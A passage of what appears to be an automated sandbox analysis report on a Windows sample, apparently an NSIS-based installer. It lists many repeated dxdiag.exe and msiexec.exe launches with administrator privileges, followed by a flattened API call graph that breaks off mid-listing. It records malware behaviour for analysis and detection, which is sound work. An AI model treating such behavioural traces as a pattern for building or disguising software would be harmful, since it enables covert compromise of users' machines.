                        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:23
                        Start time:22:36:24
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\dxdiag.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                        Imagebase:0x6d0000
                        File size:222'720 bytes
                        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:24
                        Start time:22:36:24
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\dxdiag.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                        Imagebase:0x6d0000
                        File size:222'720 bytes
                        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:25
                        Start time:22:36:25
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                        Imagebase:0x4d0000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:26
                        Start time:22:36:25
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                        Imagebase:0x4d0000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:27
                        Start time:22:36:25
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                        Imagebase:0x4d0000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:28
                        Start time:22:36:25
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                        Imagebase:0x4d0000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:29
                        Start time:22:36:25
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                        Imagebase:0x4d0000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:30
                        Start time:22:36:25
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                        Imagebase:0x4d0000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:31
                        Start time:22:36:25
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                        Imagebase:0x4d0000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:32
                        Start time:22:36:25
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                        Imagebase:0x4d0000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:33
                        Start time:22:36:25
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                        Imagebase:0x4d0000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:34
                        Start time:22:36:25
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                        Imagebase:0x4d0000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:35
                        Start time:22:36:25
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\dxdiag.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                        Imagebase:0x6d0000
                        File size:222'720 bytes
                        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:36
                        Start time:22:36:25
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\dxdiag.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                        Imagebase:0x6d0000
                        File size:222'720 bytes
                        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:37
                        Start time:22:36:25
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\dxdiag.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                        Imagebase:0x6d0000
                        File size:222'720 bytes
                        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:38
                        Start time:22:36:25
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\dxdiag.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                        Imagebase:0x6d0000
                        File size:222'720 bytes
                        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:39
                        Start time:22:36:25
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\dxdiag.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                        Imagebase:0x6d0000
                        File size:222'720 bytes
                        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:40
                        Start time:22:36:25
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\dxdiag.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                        Imagebase:0x6d0000
                        File size:222'720 bytes
                        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:41
                        Start time:22:36:25
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\dxdiag.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                        Imagebase:0x6d0000
                        File size:222'720 bytes
                        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Disassembly

                        Reset < >

                          Execution Graph

                          Execution Coverage:26.9%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:16.6%
                          Total number of Nodes:1321
                          Total number of Limit Nodes:34
                          execution_graph 3026 4015c2 3027 402c5e 21 API calls 3026->3027 3028 4015c9 SetFileAttributesA 3027->3028 3029 4015db 3028->3029 3030 402543 3041 402c9e 3030->3041 3033 402c5e 21 API calls 3034 402556 3033->3034 3035 402560 RegQueryValueExA 3034->3035 3040 4027ed 3034->3040 3036 402580 3035->3036 3037 402586 RegCloseKey 3035->3037 3036->3037 3046 4061eb wsprintfA 3036->3046 3037->3040 3042 402c5e 21 API calls 3041->3042 3043 402cb5 3042->3043 3044 406113 RegOpenKeyExA 3043->3044 3045 40254d 3044->3045 3045->3033 3046->3037 3770 401a43 3771 402c5e 21 API calls 3770->3771 3772 401a4c ExpandEnvironmentStringsA 3771->3772 3773 401a60 3772->3773 3775 401a73 3772->3775 3774 401a65 lstrcmpA 3773->3774 3773->3775 3774->3775 3047 401744 3048 402c5e 21 API calls 3047->3048 3049 40174b SearchPathA 3048->3049 3050 401766 3049->3050 3781 401d44 3782 402c3c 21 API calls 3781->3782 3783 401d4b 3782->3783 3784 402c3c 21 API calls 3783->3784 3785 401d57 GetDlgItem 3784->3785 3786 40264d 3785->3786 3787 405345 3788 405355 3787->3788 3789 405369 3787->3789 3790 40535b 3788->3790 3799 4053b2 3788->3799 3791 405371 IsWindowVisible 3789->3791 3797 405388 3789->3797 3793 404379 SendMessageA 3790->3793 3794 40537e 3791->3794 3791->3799 3792 4053b7 CallWindowProcA 3795 405365 3792->3795 3793->3795 3800 404c80 SendMessageA 3794->3800 3797->3792 3805 404d00 3797->3805 3799->3792 3801 404ca3 GetMessagePos ScreenToClient SendMessageA 3800->3801 3802 404cdf SendMessageA 3800->3802 3803 404cd7 3801->3803 3804 404cdc 3801->3804 3802->3803 3803->3797 3804->3802 3814 40628d lstrcpynA 3805->3814 3807 404d13 3815 4061eb wsprintfA 3807->3815 3809 404d1d 3810 40140b 2 API calls 3809->3810 3811 404d26 3810->3811 3816 40628d lstrcpynA 3811->3816 3813 404d2d 3813->3799 3814->3807 3815->3809 3816->3813 3817 402ac5 SendMessageA 3818 402adf InvalidateRect 3817->3818 3819 402aea 3817->3819 3818->3819 3107 4023c9 3108 4023d1 3107->3108 3109 4023d7 3107->3109 3110 402c5e 21 API calls 3108->3110 3111 402c5e 21 API calls 3109->3111 3112 4023e7 3109->3112 3110->3109 3111->3112 3113 402c5e 21 API calls 3112->3113 3115 4023f5 3112->3115 3113->3115 3114 402c5e 21 API calls 3116 4023fe WritePrivateProfileStringA 3114->3116 3115->3114 3118 4020ca 3119 4020dc 3118->3119 3129 40218a 3118->3129 3120 402c5e 21 API calls 3119->3120 3121 4020e3 3120->3121 3123 402c5e 21 API calls 3121->3123 3122 401423 28 API calls 3127 40230f 3122->3127 3124 4020ec 3123->3124 3125 402101 LoadLibraryExA 3124->3125 3126 4020f4 GetModuleHandleA 3124->3126 3128 402111 GetProcAddress 3125->3128 3125->3129 3126->3125 3126->3128 3130 402120 3128->3130 3131 40215d 3128->3131 3129->3122 3133 401423 28 API calls 3130->3133 3134 402130 3130->3134 3132 4053d1 28 API calls 3131->3132 3132->3134 3133->3134 3134->3127 3135 40217e FreeLibrary 3134->3135 3135->3127 3820 402e4a 3821 402e72 3820->3821 3822 402e59 SetTimer 3820->3822 3823 402ec7 3821->3823 3824 402e8c MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 3821->3824 3822->3821 3824->3823 3828 40244e 3829 402480 3828->3829 3830 402455 3828->3830 3832 402c5e 21 API calls 3829->3832 3831 402c9e 21 API calls 3830->3831 3834 40245c 3831->3834 3833 402487 3832->3833 3839 402d1c 3833->3839 3836 402494 3834->3836 3837 402c5e 21 API calls 3834->3837 3838 40246d RegDeleteValueA RegCloseKey 3837->3838 3838->3836 3840 402d28 3839->3840 3841 402d2f 3839->3841 3840->3836 3841->3840 3843 402d60 3841->3843 3844 406113 RegOpenKeyExA 3843->3844 3845 402d8e 3844->3845 3846 402d9e RegEnumValueA 3845->3846 3853 402e38 3845->3853 3855 402dc1 3845->3855 3847 402e28 RegCloseKey 3846->3847 3846->3855 3847->3853 3848 402dfd RegEnumKeyA 3849 402e06 RegCloseKey 3848->3849 3848->3855 3850 4066b5 5 API calls 3849->3850 3851 402e16 3850->3851 3851->3853 3854 402e1a RegDeleteKeyA 3851->3854 3852 402d60 6 API calls 3852->3855 3853->3840 3854->3853 3855->3847 3855->3848 3855->3849 3855->3852 3856 4027cf 3857 402c5e 21 API calls 3856->3857 3858 4027d6 FindFirstFileA 3857->3858 3859 4027f9 3858->3859 3863 4027e9 3858->3863 3864 4061eb wsprintfA 3859->3864 3861 402800 3865 40628d lstrcpynA 3861->3865 3864->3861 3865->3863 3298 401c53 3299 402c3c 21 API calls 3298->3299 3300 401c5a 3299->3300 3301 402c3c 21 API calls 3300->3301 3302 401c67 3301->3302 3303 402c5e 21 API calls 3302->3303 3304 401c7c 3302->3304 3303->3304 3305 401c8c 3304->3305 3306 402c5e 21 API calls 3304->3306 3307 401ce3 3305->3307 3308 401c97 3305->3308 3306->3305 3309 402c5e 21 API calls 3307->3309 3310 402c3c 21 API calls 3308->3310 3311 401ce8 3309->3311 3312 401c9c 3310->3312 3314 402c5e 21 API calls 3311->3314 3313 402c3c 21 API calls 3312->3313 3315 401ca8 3313->3315 3316 401cf1 FindWindowExA 3314->3316 3317 401cd3 SendMessageA 3315->3317 3318 401cb5 SendMessageTimeoutA 3315->3318 3319 401d0f 3316->3319 3317->3319 3318->3319 3866 402653 3867 402658 3866->3867 3868 40266c 3866->3868 3869 402c3c 21 API calls 3867->3869 3870 402c5e 21 API calls 3868->3870 3872 402661 3869->3872 3871 402673 lstrlenA 3870->3871 3871->3872 3873 402695 3872->3873 3874 405ec7 WriteFile 3872->3874 3874->3873 3875 403a54 3876 403a5f 3875->3876 3877 403a63 3876->3877 3878 403a66 GlobalAlloc 3876->3878 3878->3877 3879 4014d6 3880 402c3c 21 API calls 3879->3880 3881 4014dc Sleep 3880->3881 3883 402aea 3881->3883 3419 401957 3420 401959 3419->3420 3421 402c5e 21 API calls 3420->3421 3422 40195e 3421->3422 3425 405a4f 3422->3425 3462 405d0d 3425->3462 3428 405a77 DeleteFileA 3457 401967 3428->3457 3429 405a8e 3432 405bbc 3429->3432 3476 40628d lstrcpynA 3429->3476 3431 405ab4 3433 405ac7 3431->3433 3434 405aba lstrcatA 3431->3434 3436 406620 2 API calls 3432->3436 3432->3457 3477 405c66 lstrlenA 3433->3477 3437 405acd 3434->3437 3439 405be0 3436->3439 3438 405adb lstrcatA 3437->3438 3440 405ae6 lstrlenA FindFirstFileA 3437->3440 3438->3440 3439->3457 3490 405c1f lstrlenA CharPrevA 3439->3490 3440->3432 3460 405b0a 3440->3460 3442 405c4a CharNextA 3442->3460 3444 405a07 5 API calls 3445 405bf6 3444->3445 3446 405c10 3445->3446 3447 405bfa 3445->3447 3449 4053d1 28 API calls 3446->3449 3451 4053d1 28 API calls 3447->3451 3447->3457 3449->3457 3450 405b9b FindNextFileA 3452 405bb3 FindClose 3450->3452 3450->3460 3453 405c07 3451->3453 3452->3432 3454 406066 40 API calls 3453->3454 3454->3457 3456 405a4f 64 API calls 3456->3460 3458 4053d1 28 API calls 3458->3450 3459 4053d1 28 API calls 3459->3460 3460->3442 3460->3450 3460->3456 3460->3458 3460->3459 3461 406066 40 API calls 3460->3461 3481 40628d lstrcpynA 3460->3481 3482 405a07 3460->3482 3461->3460 3493 40628d lstrcpynA 3462->3493 3464 405d1e 3465 405cb8 4 API calls 3464->3465 3466 405d24 3465->3466 3467 405a6f 3466->3467 3468 406587 5 API calls 3466->3468 3467->3428 3467->3429 3474 405d34 3468->3474 3469 405d5f lstrlenA 3470 405d6a 3469->3470 3469->3474 3472 405c1f 3 API calls 3470->3472 3471 406620 2 API calls 3471->3474 3473 405d6f GetFileAttributesA 3472->3473 3473->3467 3474->3467 3474->3469 3474->3471 3475 405c66 2 API calls 3474->3475 3475->3469 3476->3431 3478 405c73 3477->3478 3479 405c84 3478->3479 3480 405c78 CharPrevA 3478->3480 3479->3437 3480->3478 3480->3479 3481->3460 3494 405dfb GetFileAttributesA 3482->3494 3485 405a34 3485->3460 3486 405a22 RemoveDirectoryA 3488 405a30 3486->3488 3487 405a2a DeleteFileA 3487->3488 3488->3485 3489 405a40 SetFileAttributesA 3488->3489 3489->3485 3491 405bea 3490->3491 3492 405c39 lstrcatA 3490->3492 3491->3444 3492->3491 3493->3464 3495 405a13 3494->3495 3496 405e0d SetFileAttributesA 3494->3496 3495->3485 3495->3486 3495->3487 3496->3495 3497 4033d8 SetErrorMode GetVersionExA 3498 40342a GetVersionExA 3497->3498 3500 403469 3497->3500 3499 403446 3498->3499 3498->3500 3499->3500 3501 4034ed 3500->3501 3502 4066b5 5 API calls 3500->3502 3503 406647 3 API calls 3501->3503 3502->3501 3504 403503 lstrlenA 3503->3504 3504->3501 3505 403513 3504->3505 3506 4066b5 5 API calls 3505->3506 3507 40351a 3506->3507 3508 4066b5 5 API calls 3507->3508 3509 403521 3508->3509 3510 4066b5 5 API calls 3509->3510 3511 40352d #17 OleInitialize SHGetFileInfoA 3510->3511 3586 40628d lstrcpynA 3511->3586 3514 40357b GetCommandLineA 3587 40628d lstrcpynA 3514->3587 3516 40358d 3517 405c4a CharNextA 3516->3517 3518 4035b4 CharNextA 3517->3518 3524 4035c3 3518->3524 3519 403689 3520 40369d GetTempPathA 3519->3520 3588 4033a7 3520->3588 3522 4036b5 3525 4036b9 GetWindowsDirectoryA lstrcatA 3522->3525 3526 40370f DeleteFileA 3522->3526 3523 405c4a CharNextA 3523->3524 3524->3519 3524->3523 3530 40368b 3524->3530 3527 4033a7 12 API calls 3525->3527 3598 402f31 GetTickCount GetModuleFileNameA 3526->3598 3529 4036d5 3527->3529 3529->3526 3532 4036d9 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3529->3532 3682 40628d lstrcpynA 3530->3682 3531 403722 3533 4037ba ExitProcess CoUninitialize 3531->3533 3536 4037a7 3531->3536 3543 405c4a CharNextA 3531->3543 3535 4033a7 12 API calls 3532->3535 3537 4037d1 3533->3537 3538 403928 3533->3538 3539 403707 3535->3539 3626 403a96 3536->3626 3685 4059a3 3537->3685 3541 403930 GetCurrentProcess OpenProcessToken 3538->3541 3542 4039a6 ExitProcess 3538->3542 3539->3526 3539->3533 3547 403976 3541->3547 3548 403947 LookupPrivilegeValueA AdjustTokenPrivileges 3541->3548 3549 40373c 3543->3549 3546 4037b7 3546->3533 3551 4066b5 5 API calls 3547->3551 3548->3547 3552 403781 3549->3552 3553 4037e6 3549->3553 3554 40397d 3551->3554 3556 405d0d 18 API calls 3552->3556 3555 40590e 5 API calls 3553->3555 3557 403992 ExitWindowsEx 3554->3557 3560 40399f 3554->3560 3558 4037eb lstrlenA 3555->3558 3559 40378d 3556->3559 3557->3542 3557->3560 3689 40628d lstrcpynA 3558->3689 3559->3533 3683 40628d lstrcpynA 3559->3683 3562 40140b 2 API calls 3560->3562 3562->3542 3563 403803 3570 40381b 3563->3570 3690 40628d lstrcpynA 3563->3690 3565 40379c 3684 40628d lstrcpynA 3565->3684 3568 403839 wsprintfA 3569 406320 21 API calls 3568->3569 3569->3570 3570->3568 3571 403867 3570->3571 3571->3533 3571->3568 3571->3570 3572 405897 2 API calls 3571->3572 3573 4058f1 2 API calls 3571->3573 3574 403877 GetFileAttributesA 3571->3574 3575 4038af SetCurrentDirectoryA 3571->3575 3578 4038aa 3571->3578 3580 405a4f 71 API calls 3571->3580 3581 406066 40 API calls 3571->3581 3582 406320 21 API calls 3571->3582 3583 405926 2 API calls 3571->3583 3584 403918 CloseHandle 3571->3584 3585 406620 2 API calls 3571->3585 3572->3571 3573->3571 3574->3571 3576 403883 DeleteFileA 3574->3576 3577 406066 40 API calls 3575->3577 3576->3571 3579 4038be CopyFileA 3577->3579 3578->3533 3579->3533 3579->3571 3580->3571 3581->3571 3582->3571 3583->3571 3584->3533 3585->3571 3586->3514 3587->3516 3589 406587 5 API calls 3588->3589 3591 4033b3 3589->3591 3590 4033bd 3590->3522 3591->3590 3592 405c1f 3 API calls 3591->3592 3593 4033c5 3592->3593 3594 4058f1 2 API calls 3593->3594 3595 4033cb 3594->3595 3596 405e4f 2 API calls 3595->3596 3597 4033d6 3596->3597 3597->3522 3691 405e20 GetFileAttributesA CreateFileA 3598->3691 3600 402f71 3601 402f81 3600->3601 3692 40628d lstrcpynA 3600->3692 3601->3531 3603 402f97 3604 405c66 2 API calls 3603->3604 3605 402f9d 3604->3605 3693 40628d lstrcpynA 3605->3693 3607 402fa8 GetFileSize 3622 4030a2 3607->3622 3625 402fbf 3607->3625 3609 4030ab 3609->3601 3611 4030db GlobalAlloc 3609->3611 3706 403390 SetFilePointer 3609->3706 3610 40337a ReadFile 3610->3625 3705 403390 SetFilePointer 3611->3705 3613 40310e 3617 402ecd 6 API calls 3613->3617 3615 4030c4 3618 40337a ReadFile 3615->3618 3616 4030f6 3619 403168 35 API calls 3616->3619 3617->3601 3620 4030cf 3618->3620 3623 403102 3619->3623 3620->3601 3620->3611 3621 402ecd 6 API calls 3621->3625 3694 402ecd 3622->3694 3623->3601 3623->3623 3624 40313f SetFilePointer 3623->3624 3624->3601 3625->3601 3625->3610 3625->3613 3625->3621 3625->3622 3627 4066b5 5 API calls 3626->3627 3628 403aaa 3627->3628 3629 403ab0 3628->3629 3630 403ac2 3628->3630 3715 4061eb wsprintfA 3629->3715 3631 406174 3 API calls 3630->3631 3632 403aed 3631->3632 3634 403b0b lstrcatA 3632->3634 3636 406174 3 API calls 3632->3636 3635 403ac0 3634->3635 3707 403d5b 3635->3707 3636->3634 3639 405d0d 18 API calls 3640 403b3d 3639->3640 3641 403bc6 3640->3641 3643 406174 3 API calls 3640->3643 3642 405d0d 18 API calls 3641->3642 3644 403bcc 3642->3644 3645 403b69 3643->3645 3646 403bdc LoadImageA 3644->3646 3647 406320 21 API calls 3644->3647 3645->3641 3650 403b85 lstrlenA 3645->3650 3654 405c4a CharNextA 3645->3654 3648 403c82 3646->3648 3649 403c03 RegisterClassA 3646->3649 3647->3646 3652 40140b 2 API calls 3648->3652 3651 403c39 SystemParametersInfoA CreateWindowExA 3649->3651 3681 403c8c 3649->3681 3655 403b93 lstrcmpiA 3650->3655 3656 403bb9 3650->3656 3651->3648 3653 403c88 3652->3653 3660 403d5b 22 API calls 3653->3660 3653->3681 3658 403b83 3654->3658 3655->3656 3659 403ba3 GetFileAttributesA 3655->3659 3657 405c1f 3 API calls 3656->3657 3661 403bbf 3657->3661 3658->3650 3662 403baf 3659->3662 3664 403c99 3660->3664 3716 40628d lstrcpynA 3661->3716 3662->3656 3663 405c66 2 API calls 3662->3663 3663->3656 3666 403ca5 ShowWindow 3664->3666 3667 403d28 3664->3667 3669 406647 3 API calls 3666->3669 3668 4054a3 5 API calls 3667->3668 3670 403d2e 3668->3670 3671 403cbd 3669->3671 3672 403d32 3670->3672 3673 403d4a 3670->3673 3674 403ccb GetClassInfoA 3671->3674 3676 406647 3 API calls 3671->3676 3679 40140b 2 API calls 3672->3679 3672->3681 3675 40140b 2 API calls 3673->3675 3677 403cf5 DialogBoxParamA 3674->3677 3678 403cdf GetClassInfoA RegisterClassA 3674->3678 3675->3681 3676->3674 3680 40140b 2 API calls 3677->3680 3678->3677 3679->3681 3680->3681 3681->3546 3682->3520 3683->3565 3684->3536 3686 4059b8 3685->3686 3687 4037de ExitProcess 3686->3687 3688 4059cc MessageBoxIndirectA 3686->3688 3688->3687 3689->3563 3690->3570 3691->3600 3692->3603 3693->3607 3695 402ed6 3694->3695 3696 402eee 3694->3696 3697 402ee6 3695->3697 3698 402edf DestroyWindow 3695->3698 3699 402ef6 3696->3699 3700 402efe GetTickCount 3696->3700 3697->3609 3698->3697 3701 4066f1 2 API calls 3699->3701 3702 402f0c CreateDialogParamA ShowWindow 3700->3702 3703 402f2f 3700->3703 3704 402efc 3701->3704 3702->3703 3703->3609 3704->3609 3705->3616 3706->3615 3708 403d6f 3707->3708 3717 4061eb wsprintfA 3708->3717 3710 403de0 3711 403e14 22 API calls 3710->3711 3713 403de5 3711->3713 3712 403b1b 3712->3639 3713->3712 3714 406320 21 API calls 3713->3714 3714->3713 3715->3635 3716->3641 3717->3710 3884 402758 3885 402a6c 3884->3885 3886 40275f 3884->3886 3887 402c3c 21 API calls 3886->3887 3888 402766 3887->3888 3889 402775 SetFilePointer 3888->3889 3889->3885 3890 402785 3889->3890 3892 4061eb wsprintfA 3890->3892 3892->3885 3893 401e5a GetDC 3894 402c3c 21 API calls 3893->3894 3895 401e6c GetDeviceCaps MulDiv ReleaseDC 3894->3895 3896 402c3c 21 API calls 3895->3896 3897 401e9d 3896->3897 3898 406320 21 API calls 3897->3898 3899 401eda CreateFontIndirectA 3898->3899 3900 40264d 3899->3900 2892 4015e0 2911 402c5e 2892->2911 2896 401649 2898 401677 2896->2898 2899 40164e 2896->2899 2902 401423 28 API calls 2898->2902 2933 401423 2899->2933 2907 40166f 2902->2907 2906 401660 SetCurrentDirectoryA 2906->2907 2908 401631 GetFileAttributesA 2910 4015ef 2908->2910 2910->2896 2910->2908 2923 405c4a 2910->2923 2927 40590e 2910->2927 2930 405897 CreateDirectoryA 2910->2930 2937 4058f1 CreateDirectoryA 2910->2937 2912 402c6a 2911->2912 2940 406320 2912->2940 2915 4015e7 2917 405cb8 CharNextA CharNextA 2915->2917 2918 405ce3 2917->2918 2919 405cd3 2917->2919 2921 405c4a CharNextA 2918->2921 2922 405d03 2918->2922 2919->2918 2920 405cde CharNextA 2919->2920 2920->2922 2921->2918 2922->2910 2924 405c50 2923->2924 2925 405c63 2924->2925 2926 405c56 CharNextA 2924->2926 2925->2910 2926->2924 2928 4066b5 5 API calls 2927->2928 2929 405915 2928->2929 2929->2910 2931 4058e3 2930->2931 2932 4058e7 GetLastError 2930->2932 2931->2910 2932->2931 2987 4053d1 2933->2987 2936 40628d lstrcpynA 2936->2906 2938 405901 2937->2938 2939 405905 GetLastError 2937->2939 2938->2910 2939->2938 2942 40632d 2940->2942 2941 40656e 2943 402c8b 2941->2943 2979 40628d lstrcpynA 2941->2979 2942->2941 2945 406545 lstrlenA 2942->2945 2948 406320 15 API calls 2942->2948 2950 40644c GetSystemDirectoryA 2942->2950 2951 406462 GetWindowsDirectoryA 2942->2951 2952 406587 5 API calls 2942->2952 2953 406320 15 API calls 2942->2953 2954 4064ee lstrcatA 2942->2954 2956 4064c5 SHGetPathFromIDListA CoTaskMemFree 2942->2956 2966 406174 2942->2966 2971 4066b5 GetModuleHandleA 2942->2971 2977 4061eb wsprintfA 2942->2977 2978 40628d lstrcpynA 2942->2978 2943->2915 2957 406587 2943->2957 2945->2942 2948->2945 2950->2942 2951->2942 2952->2942 2953->2942 2954->2942 2956->2942 2963 406593 2957->2963 2958 4065fb 2959 4065ff CharPrevA 2958->2959 2961 40661a 2958->2961 2959->2958 2960 4065f0 CharNextA 2960->2958 2960->2963 2961->2915 2962 405c4a CharNextA 2962->2963 2963->2958 2963->2960 2963->2962 2964 4065de CharNextA 2963->2964 2965 4065eb CharNextA 2963->2965 2964->2963 2965->2960 2980 406113 2966->2980 2969 4061a8 RegQueryValueExA RegCloseKey 2970 4061d7 2969->2970 2970->2942 2972 4066d1 2971->2972 2973 4066db GetProcAddress 2971->2973 2984 406647 GetSystemDirectoryA 2972->2984 2976 4066ea 2973->2976 2975 4066d7 2975->2973 2975->2976 2976->2942 2977->2942 2978->2942 2979->2943 2981 406122 2980->2981 2982 406126 2981->2982 2983 40612b RegOpenKeyExA 2981->2983 2982->2969 2982->2970 2983->2982 2985 406669 wsprintfA LoadLibraryExA 2984->2985 2985->2975 2988 4053ec 2987->2988 2997 401431 2987->2997 2989 405409 lstrlenA 2988->2989 2990 406320 21 API calls 2988->2990 2991 405432 2989->2991 2992 405417 lstrlenA 2989->2992 2990->2989 2993 405445 2991->2993 2994 405438 SetWindowTextA 2991->2994 2995 405429 lstrcatA 2992->2995 2992->2997 2996 40544b SendMessageA SendMessageA SendMessageA 2993->2996 2993->2997 2994->2993 2995->2991 2996->2997 2997->2936 3901 4016e0 3902 402c5e 21 API calls 3901->3902 3903 4016e6 GetFullPathNameA 3902->3903 3904 40171e 3903->3904 3905 4016fd 3903->3905 3906 401732 GetShortPathNameA 3904->3906 3907 402aea 3904->3907 3905->3904 3908 406620 2 API calls 3905->3908 3906->3907 3909 40170e 3908->3909 3909->3904 3911 40628d lstrcpynA 3909->3911 3911->3904 3912 404463 lstrcpynA lstrlenA 3117 405969 ShellExecuteExA 3136 401eea 3137 402c3c 21 API calls 3136->3137 3138 401ef0 3137->3138 3139 402c3c 21 API calls 3138->3139 3140 401efc 3139->3140 3141 401f13 EnableWindow 3140->3141 3142 401f08 ShowWindow 3140->3142 3143 402aea 3141->3143 3142->3143 3144 40176b 3145 